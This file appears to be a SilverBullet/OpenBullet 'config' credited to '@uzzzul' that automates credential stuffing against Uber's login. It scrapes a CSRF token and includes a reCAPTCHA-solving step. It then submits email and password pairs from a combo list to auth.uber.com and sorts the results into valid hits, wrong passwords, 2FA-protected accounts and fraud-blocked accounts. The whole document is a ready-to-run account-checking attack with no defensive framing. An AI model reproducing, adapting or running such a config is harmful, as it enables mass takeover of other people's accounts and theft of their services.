[SETTINGS]
{
  "Name": "uber",
  "SuggestedBots": 1,
  "MaxCPM": 0,
  "LastModified": "2022-01-01T00:22:48.4145028+02:00",
  "AdditionalInfo": "",
  "RequiredPlugins": [],
  "Author": "@uzzzul",
  "Version": "1.1.2 [SB]",
  "SaveEmptyCaptures": false,
  "ContinueOnCustom": false,
  "SaveHitsToTextFile": false,
  "IgnoreResponseErrors": false,
  "MaxRedirects": 8,
  "NeedsProxies": false,
  "OnlySocks": false,
  "OnlySsl": false,
  "MaxProxyUses": 0,
  "BanProxyAfterGoodStatus": false,
  "BanLoopEvasionOverride": -1,
  "EncodeData": false,
  "AllowedWordlist1": "",
  "AllowedWordlist2": "",
  "DataRules": [],
  "CustomInputs": [],
  "CaptchaUrl": "",
  "IsBase64": false,
  "FilterList": [],
  "EvaluateMathOCR": false,
  "SecurityProtocol": 0,
  "ForceHeadless": false,
  "AlwaysOpen": false,
  "AlwaysQuit": false,
  "QuitOnBanRetry": false,
  "AcceptInsecureCertificates": true,
  "DisableNotifications": false,
  "DisableImageLoading": false,
  "DefaultProfileDirectory": false,
  "CustomUserAgent": "",
  "RandomUA": false,
  "CustomCMDArgs": "",
  "Title": "uber",
  "IconPath": "Icon\\svbfile.ico",
  "LicenseSource": null,
  "Message": null,
  "MessageColor": "#FFFFFFFF",
  "HitInfoFormat": "[{hit.Type}][{hit.Proxy}] {hit.Data} - [{hit.CapturedString}]",
  "AuthorColor": "#FFFFB266",
  "WordlistColor": "#FFB5C2E1",
  "BotsColor": "#FFA8FFFF",
  "CustomInputColor": "#FFD6C7C7",
  "CPMColor": "#FFFFFFFF",
  "ProgressColor": "#FFAD93E3",
  "HitsColor": "#FF66FF66",
  "CustomColor": "#FFFFB266",
  "ToCheckColor": "#FF7FFFD4",
  "FailsColor": "#FFFF3333",
  "RetriesColor": "#FFFFFF99",
  "OcrRateColor": "#FF4698FD",
  "ProxiesColor": "#FFFFFFFF"
}

[SCRIPT]
REQUEST GET "https://auth.uber.com/login/session" AcceptEncoding=FALSE 
  
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36" 
  HEADER "Pragma: no-cache" 
  HEADER "Accept: */*" 

PARSE "<SOURCE>" LR "\":\"production\",\"csrfToken\":\"" "\"" -> VAR "1" 

!SOLVECAPTCHA ReCaptchaV2 "6LdoZSkTAAAAAEyquKnCAeiBngVx1w1DOfML7cix" "https://auth.uber.com/login/session" 

REQUEST POST "https://auth.uber.com/login/handleanswer" 
  CONTENT "{\"answer\":{\"type\":\"VERIFY_INPUT_EMAIL\",\"userIdentifier\":{\"email\":\"<USER>\"}},\"init\":true}" 
  CONTENTTYPE "application/json" 
  HEADER ": scheme: https" 
  HEADER "accept: application/json" 
  HEADER "accept-encoding: gzip, deflate, br" 
  HEADER "accept-language: en-US,en;q=0.9" 
  HEADER "content-length: 105" 
  HEADER "content-type: application/json" 
  HEADER "origin: https://auth.uber.com" 
  HEADER "sec-fetch-dest: empty" 
  HEADER "sec-fetch-mode: cors" 
  HEADER "sec-fetch-site: same-origin" 
  HEADER "sec-gpc: 1" 
  HEADER "user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.110 Safari/537.36" 
  HEADER "x-csrf-token: <1>" 

KEYCHECK 
  KEYCHAIN Success OR 
    KEY "\"type\":\"VERIFY_PASSWORD\"" 
  KEYCHAIN Failure OR 
    KEY "\"type\":\"FAIL_EMAIL_NOT_FOUND\"" 

REQUEST POST " https://auth.uber.com/login/handleanswer" AcceptEncoding=FALSE 
  CONTENT "{\"answer\":{\"type\":\"VERIFY_PASSWORD\",\"password\":\"<PASS>\"},\"rememberMe\":true}" 
  CONTENTTYPE "application/json" 
  HEADER "Host: auth.uber.com" 
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:90.0) Gecko/20100101 Firefox/90.0" 
  HEADER "Accept: application/json" 
  HEADER "x-csrf-token: <1>" 
  HEADER "Origin: https://auth.uber.com" 
  HEADER "Alt-Used: auth.uber.com" 
  HEADER "Connection: keep-alive" 

KEYCHECK 
  KEYCHAIN Custom "Disabled" OR 
    KEY "type\":\"FAIL_FRAUD_LOGIN_DENIED" 
  KEYCHAIN Failure OR 
    KEY "FAIL_PASSWORD_INCORRECT\"" 
  KEYCHAIN Custom "2FACTOR" OR 
    KEY "\"question\":{\"type\":\"SMS_OTP" 
  KEYCHAIN Success AND 
    KEY "{\"nextURL\":\"https://accounts.uber.com/profile" 
  KEYCHAIN Custom "UNSUBSCRIBED" OR 
    KEY "\"FAIL_UNSUBSCRIBED_SMS" 

#author FUNCTION Constant "@uzzzul" -> CAP "configby" 

